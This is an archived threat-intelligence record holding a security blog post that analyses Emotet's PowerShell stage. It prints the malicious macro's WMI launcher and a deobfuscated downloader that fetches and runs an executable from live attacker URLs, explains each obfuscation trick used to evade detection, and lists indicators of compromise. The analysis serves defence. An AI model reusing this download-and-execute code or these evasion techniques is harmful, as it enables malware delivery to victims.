{
	"id": "ac08e186-bccd-4ef6-bbfa-5bbeb42af3d5",
	"created_at": "2026-04-06T00:08:40.441125Z",
	"updated_at": "2026-04-10T03:21:18.691711Z",
	"deleted_at": null,
	"sha1_hash": "e3289fca944318ce7b22b926eddfc900cd190a69",
	"title": "Emotet Technical Analysis - Part 2 PowerShell Unveiled",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 150864,
	"plain_text": "Emotet Technical Analysis - Part 2 PowerShell Unveiled\r\nBy Suleyman Ozarslan, PhD\r\nPublished: 2020-02-07 · Archived: 2026-04-05 23:00:50 UTC\r\nEmotet first appeared in 2014 as a banking trojan built to steal sensitive information and financial credentials.\r\nOver time it evolved into a large, modular botnet that functions like Infrastructure as a Service for cybercrime.\r\nInstead of focusing only on theft, Emotet now delivers additional payloads for partner crews, including other\r\nbanking trojans, credential stealers, spam modules, and ransomware loaders. This shift turned Emotet into a\r\ndistribution hub that fuels many different intrusions across industries.\r\nOperators rely on high volume email campaigns, thread hijacking, and malicious attachments or links to seed new\r\ninfections. Once a system is compromised, Emotet deploys modules for persistence, lateral movement, and\r\ncredential harvesting. It is known for frequent code updates, polymorphic payloads, and fast changing command\r\nand control infrastructure to evade detection. Obfuscation techniques include packed binaries, encrypted\r\nconfigurations, and randomized filenames and services. Emotet has survived takedowns and reemerged with\r\nrefreshed loaders and new delivery partners, which keeps it relevant as a first stage tool in many attack chains.\r\nDefenders can reduce risk by blocking macro enabled documents from the internet, enforcing multifactor\r\nauthentication, and restricting script interpreters where possible. Collect process creation and command line\r\ntelemetry, monitor email for thread hijacking indicators, and alert on unusual outbound connections and sudden\r\nspikes in SMB or SMTP traffic. Maintain tested backups and segment critical systems to limit lateral movement.\r\nFinally, validate controls against real Emotet behaviors so you can confirm that detections fire, response\r\nplaybooks work, and access is contained before additional malware is deployed.\r\nWe revealed obfuscated Visual Basic codes in the first part of the Emotet Technical Analysis series . In this second\r\npart, we analyze the PowerShell codes in the Emotet malware document ( PowerShell, MITRE ATT\u0026CK T1086 ).\r\nWe analyzed the following Word document step by step in the first part:\r\nMD5: 515f13034bc4ccf635b026722fd5ef9c\r\nSHA-1: 8925b822e1d86d787b4682d1bb803cf1f5ea7031\r\nSHA-256:\r\nVirusTotal detection rate: 13/61 as of January 21, 2020\r\nNames: ST_28546448.doc, 01856218536426646.doc\r\n1) VBA code analysis\r\nLet's remember the revealed VBA code ( Scripting, MITRE ATT\u0026CK T1064 ):\r\nhttps://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled\r\nPage 1 of 9\n\n1.\r\nDo While GetObject(winmgmtS:win32_Process).Create(\"Powershell -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBn\r\nLoop\r\nIn this Do While loop, the Create method of the Win32_Process class is used to create a new process.\r\n💡\r\nThe Create WMI class method creates a new process.\r\nSyntax:\r\nuint32 Create(\r\n [in] string CommandLine,\r\n [in] string CurrentDirectory,\r\n [in] Win32_ProcessStartup ProcessStartupInformation,\r\n [out] uint32 ProcessId\r\n);\r\nThe first variable is the CommandLine to execute. It is a PowerShell command in this code (\r\nPowerShell, MITRE ATT\u0026CK T1086 ).\r\nThe second variable is the CurrentDirectory . If this parameter is NULL , the new process will have the\r\nsame path as the calling process.\r\nThe third variable is ProcessStartupInformation , like winmgmtS:win32_ProcessStartuP in this\r\nexample.\r\n💡 The Win32_ProcessStartup abstract WMI class represents the startup configuration of a Windows-based\r\nprocess. The class is defined as a method type definition, which means that it is only used for passing information\r\nto the Create method of the Win32_Process class.\r\nThe last variable is the global process identifier that can be used to identify a process.\r\nTherefore, the VBA code embedded in the Word document executes a PowerShell command using WMI (\r\nWindows Management Instrumentation, MITRE ATT\u0026CK T1047 ) .\r\n2) Analyzing the PowerShell parameters\r\nWe'll reveal the obfuscated malicious PowerShell command in this blog. Let's remember the PowerShell\r\ncommand:\r\n2.\r\nPowershell -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHk\r\nhttps://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled\r\nPage 2 of 9\n\nLet's start with the -w parameter and the hidden value: -w hidden . However, there is not a parameter\r\nnamed -w according to the official PowerShell documentation . In fact, the -w parameter is completed\r\nby PowerShell as the -WindowStyle parameter because of the parameter substring completion feature of\r\nPowerShell .\r\n💡 PowerShell Parameter Completion: Substrings of parameters like -NoEx (- NoExit), -Executi (-\r\nExecutionPolicy), -w (-WindowStyle) are used in the PowerShell command instead of using the complete\r\nparameter string to avoid detection. Because of the way that PowerShell handles parameters, parameter substrings\r\nlike -W, -Wi, -WindowSt, -WindowSty, are all valid ways of specifying an execution argument such as -\r\nWindowStyle.\r\n💡\r\n💡-w can be used for -WindowStyle , because -WindowStyle is the only parameter starts with -w .\r\nAdversaries commonly use the -WindowStyle parameter with Hidden value in malicious PowerShell\r\ncommands to avoid detection ( Hidden Window, MITRE ATT\u0026CK T1143 ). Actually, -WindowStyle Hidden does\r\nnot entirely hide the PowerShell command windows, it shows the command window for a while before hiding it.\r\n💡 -WindowStyle parameter sets the window style for the session. Valid values are Normal, Minimized,\r\nMaximized, and Hidden .\r\nThe second parameter is -en . Similar to -w , there is not a parameter named -en according to the\r\nofficial PowerShell documentation . The -en parameter is completed as -EncodedCommand parameter by\r\nPowerShell.\r\n💡The -e parameter cannot be used for the -EncodedCommand , because multiple parameters start with -e : -\r\nEncodedCommand and -ExecutionPolicy .\r\nTherefore, we must use base64 decoding to reveal the PowerShell command ( Obfuscated Files or\r\nInformation, MITRE ATT\u0026CK T1027 ). After base64 decoding:\r\n3.\r\n$Azytjhzgaumig='Nvxdxgccbng';$Nnyjthcrzjoyv = '937';$Iiqsfpsm='Rogxpgyve';$Ekxhlobqrlh=$env:userprofile+'\\'+$Nny\r\n3) Deobfuscation of the PowerShell code\r\nLet's beautify the code:\r\n4.\r\n$Azytjhzgaumig='Nvxdxgccbng';\r\n$Nnyjthcrzjoyv = '937';\r\n$Iiqsfpsm='Rogxpgyve';\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+$Nnyjthcrzjoyv+'.exe';\r\n$Sbrypywxgcitf='Wpawybiqmj';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\nhttps://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled\r\nPage 3 of 9\n\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-i\r\n$Nuoltwfqh='Qrvohdiubfek';\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"Dow`Nloadfi`LE\"($Ndlualuv, $Ekxhlobqrlh);\r\n$Hkukkfoptjdr='Xabdxvkfcma';\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"L`eng`TH\" -ge 29936) {[Diagnostics.Process]::\"s`TARt\"($Ekxhlobqrlh);\r\n$Yzjjfplmkgx='Bxlkqmtxa';\r\nbreak;\r\n$Molchijx='Quatlbdlqvfdp'}}\r\ncatch{}}\r\n$Rckajrxvi='Ejecwargkcl'\r\nThere are garbage variables to obfuscate the code. Let's remove them:\r\n5.\r\n$Nnyjthcrzjoyv = '937';\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+$Nnyjthcrzjoyv+'.exe';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-i\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"Dow`Nloadfi`LE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"L`eng`TH\" -ge 29936) {[Diagnostics.Process]::\"s`TARt\"($Ekxhlobqrlh);\r\nbreak;}}\r\ncatch{}}\r\nThere are `(backtick) characters, which are used to obfuscate the code. In this case, it is not used to escape any\r\ncharacter, so we can remove it from the code.\r\n💡`(backtick, grave accent) character is the PowerShell's escape character.\r\n6.\r\n$Nnyjthcrzjoyv = '937';\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+$Nnyjthcrzjoyv+'.exe';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-i\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"DowNloadfiLE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($Ekxhlobqrlh);\r\nbreak;}}\r\ncatch{}}\r\nLet's put ' 937 ' in place of $Nnyjthcrzjoyv .\r\n7.\r\n$Ekxhlobqrlh=$env:userprofile+'\\'+'937'+'.exe';\r\n$Hirmyhqaltos=\u0026('new-o'+'bj'+'ect') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-i\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"DowNloadfiLE\"($Ndlualuv, $Ekxhlobqrlh);\r\nhttps://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled\r\nPage 4 of 9\n\nIf ((\u0026('Get-I'+'tem') $Ekxhlobqrlh).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($Ekxhlobqrlh);\r\nbreak;}}\r\ncatch{}}\r\nNow, let's get rid of + characters.\r\n💡\r\n💡+ operator in PowerShell concatenates two string expressions and adds integers.\r\n8.\r\n$Ekxhlobqrlh=$env:userprofile\\937.exe';\r\n$Hirmyhqaltos=\u0026('new-object') NeT.WeBCLiEnT;\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-i\r\nforeach($Ndlualuv in $Rxbywici){try{$Hirmyhqaltos.\"DowNloadfiLE\"($Ndlualuv, $Ekxhlobqrlh);\r\nIf ((\u0026('Get-Item') $Ekxhlobqrlh).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($Ekxhlobqrlh); break;}}\r\ncatch{}}\r\nLet's put ' $env:userprofile\\937.exe ' in place of $Ekxhlobqrlh , and ' \u0026('new-object') NeT.WeBCLiEnT ' in\r\nplace of $Hirmyhqaltos :\r\n9.\r\n$Rxbywici='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-i\r\nforeach($Ndlualuv in $Rxbywici){try{\u0026('new-object') NeT.WeBCLiEnT.DowNloadfiLE($Ndlualuv, $env:userprofile\\937.e\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($env:userprofil\r\nbreak;}}\r\ncatch{}}\r\nLet's change variable names with more readable ones:\r\n10.\r\n$list='http://ahc.mrbdev.com/wp-admin/qp0/*http://e-twow.be/verde/in6k/*https://magnificentpakistan.com/wp-inclu\r\nforeach($url in $list){try{\u0026('new-object') NeT.WeBCLiEnT.DowNloadfiLE($url, $env:userprofile\\937.exe);\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($env:userprofil\r\nbreak;}}\r\ncatch{}}\r\nNow, we must reveal the $list variable. The Split() method is used in this variable.\r\n💡Split(Char[]) splits a string into substrings that are based on the characters in the separator array.\r\nIn this case, the separator is [char]42 , which is equal to the * (asterisk) character. Therefore,\r\n11.\r\n$list=('http://ahc.mrbdev.com/wp-admin/qp0/','http://e-twow.be/verde/in6k/','https://magnificentpakistan.com/wp-https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled\r\nPage 5 of 9\n\nforeach($url in $list){try{\u0026('new-object') NeT.WeBCLiEnT.\"DowNloadfiLE\"($url, $env:userprofile\\937.exe);\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"LengTH\" -ge 29936) {[Diagnostics.Process]::\"sTARt\"($env:userprofil\r\ncatch{}}\r\nLet's change the random case to PascalCase:\r\n💡\r\n💡Randomized case : In this old method, uppercase and lowercase letters appear in a random sequence in the\r\ncode, which is useful to bypass weak security controls.\r\n4) Analyzing the deobfuscated PowerShell code\r\n12.\r\n$list=('http://ahc.mrbdev.com/wp-admin/qp0/','http://e-twow.be/verde/in6k/','https://magnificentpakistan.com/wp-foreach($url in $list){try{\u0026('new-object') Net.WebClient.DownloadFile\"($url, $env:userprofile\\937.exe);\r\nIf ((\u0026('Get-Item') $env:userprofile\\937.exe).\"Length\" -ge 29936) {[Diagnostics.Process]::\"Start\"($env:userprofil\r\nbreak;}}\r\ncatch{}}\r\nThe first line defines the $list array that includes the following URLs :\r\nhxxp://ahc.mrbdev.com/wp-admin/qp0/\r\nhxxp://e-twow.be/verde/in6k/\r\nhxxps://magnificentpakistan.com/wp-includes/ha5j0b1/\r\nhxxps://www.qwqoo.com/homldw/3piyy4/\r\nhxxp://siwakuposo.com/siwaku2/X5zB0ey/\r\nThe second line,a foreach loop, tries to download a file from the URLS included in the $list array in\r\nthe given order via the Net.WebClient.DownloadFile method and saves the downloaded file to the\r\n$env:userprofile directory as 937.exe .\r\n💡$env:userprofile indicates the userprofile environment variable that specifies the user's profile directory.\r\nThis directory stores personal data of the user and a typical path is C:\\Users\\Username .\r\nThe third line, an If condition, returns true if the length of the downloaded file 937.exe is greater\r\nthan or equal to 29936 bytes by using -ge 29936 comparison operator ( ge: greater than or equal ).\r\nIf it returns true, Diagnostics.Process.Start method executes the 937.exe , then exits the loop. The\r\nexact file size of 937.exe is 905472 bytes . What could be the reason for comparing the file size? The\r\nanswer is simple; adversaries are trying to figure out whether the file is actually downloaded.\r\nhttps://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled\r\nPage 6 of 9\n\n💡Diagnostics.Process.Start(string fileName) : The Process.Start method of\r\nSystem.Diagnostics namespace starts a process resource by specifying the name of a document or\r\napplication file and associates the resource with a new Process component.\r\nAdversaries used the Invoke-Item cmdlet to execute the downloaded file in our previous Emotet analysis . Now,\r\nthey are using the Process.Start method instead of Invoke-Item to decrease the detection rate.\r\nIn our analysis, the PowerShell coded downloaded 937.exe from the first URL. The other URLs are also active.\r\nMD5: 032a5220e159fcf2f33cc9799f11ade6\r\nSHA-1: 9768eb95d1ac398425fc5eced31b5f83025c6faf\r\nSHA-256: cb463bc2cfbe95d234afc0d3708babb85c7e29089d3691ab0ba6695eeeccb60f\r\nVirusTotal detection rate: 6/73 as of January 21, 2020, 49/73 as of February 6, 2020\r\nNames: 937.exe, 565.exe\r\nSummary\r\nThe purpose of this second part of the Emotet Technical Analysis Series is analyzing the PowerShell code\r\nincluded in the heavily obfuscated Visual Basic macros revealed in the first article . Briefly, this PowerShell code\r\ndownloads a file from a list of URLs, then executes the file as a process.\r\nAdversaries used the following techniques in the PowerShell code for obfuscation and evasion:\r\n1. WMI was used to create a process instead of cmd . If WMI activity is not monitored, it is hard to detect\r\nthe creation of the malicious process.\r\n2. Substrings of parameters were used instead of the complete version of the parameters. PowerShell\r\ncompletes the incomplete version of a parameter. -w was used for -WindowStyle and -en was used for\r\nthe -EncodedCommand .\r\n3. The -WindowStyle parameter was used with the Hidden value to hide the PowerShell command\r\nwindow.\r\n4. The Base64-encoded version of the PowerShell command was used with -EncodedCommand parameter.\r\n5. Garbage variable assignments were used to obfuscate the code.\r\n6. The ` (backtick character was used to obfuscate strings. For example, Dow`Nloadfi`LE was used\r\ninstead of DowNloadfiLE .\r\n7. + operator was used to concatenate fragmented strings. As an example, 'new-o'+'bj'+'ect' was used\r\ninstead of newobject to evade weak security controls.\r\n8. URLs were joined with * (asterisk) character to evade weak URL regexes of security controls. Then,\r\nthe Split() method was used to separate URLs.\r\nhttps://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled\r\nPage 7 of 9\n\n9. The [char] conversion function was used to obfuscate. For example, [char]42 was used for the *\r\n(asterisk) character.\r\n10. Randomized case (e.g., NeT.WeBCLiEnT ) was used to bypass weak security controls.\r\n11. The Process.Start method was used to execute the downloaded file instead of the more common\r\nexecution method like the Invoke-Item cmdlet.\r\nWhat is next?\r\nWe will analyze the behavior of the executed file 937.exe in the third part of the Emotet Technical Analysis\r\nseries.\r\nMITRE’s ATT\u0026CK Techniques Observed\r\nExecution Defense Evasion\r\nT1086 PowerShell T1027 Obfuscated Files or Information\r\nT1064 Scripting T1143 Hidden Windows\r\nT1047 Windows Management Instrumentation T1064 Scripting\r\nIndicator of Compromises (IoCs)\r\nExecutable\r\ncb463bc2cfbe95d234afc0d3708babb85c7e29089d3691ab0ba6695eeeccb60f\r\nDomains\r\n5kmtechnologies.com\r\ne-twow.be\r\nqwqoo.com\r\nmagnificentpakistan.com\r\nsiwakuposo.com\r\nyesimsatirli.com\r\nURLs\r\nhttps://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled\r\nPage 8 of 9\n\nhxxp://ahc.mrbdev.com/wp-admin/qp0/\r\nhxxp://e-twow.be/verde/in6k/\r\nhxxps://humana.5kmtechnologies.com/wp-includes/KdR9xbBq1/\r\nhxxps://magnificentpakistan.com/wp-includes/ha5j0b1/\r\nhxxps://www.qwqoo.com/homldw/3piyy4/\r\nhxxp://siwakuposo.com/siwaku2/X5zB0ey/\r\nhxxp://yesimsatirli.com/baby/HsWjaCfoR/\r\nIPs\r\n83.150.215.163\r\n111.90.144.211\r\nSource: https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled\r\nhttps://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled"
	],
	"report_names": [
		"emotet-technical-analysis-part-2-powershell-unveiled"
	],
	"threat_actors": [],
	"ts_created_at": 1775434120,
	"ts_updated_at": 1775791278,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e3289fca944318ce7b22b926eddfc900cd190a69.pdf",
		"text": "https://archive.orkl.eu/e3289fca944318ce7b22b926eddfc900cd190a69.txt",
		"img": "https://archive.orkl.eu/e3289fca944318ce7b22b926eddfc900cd190a69.jpg"
	}
}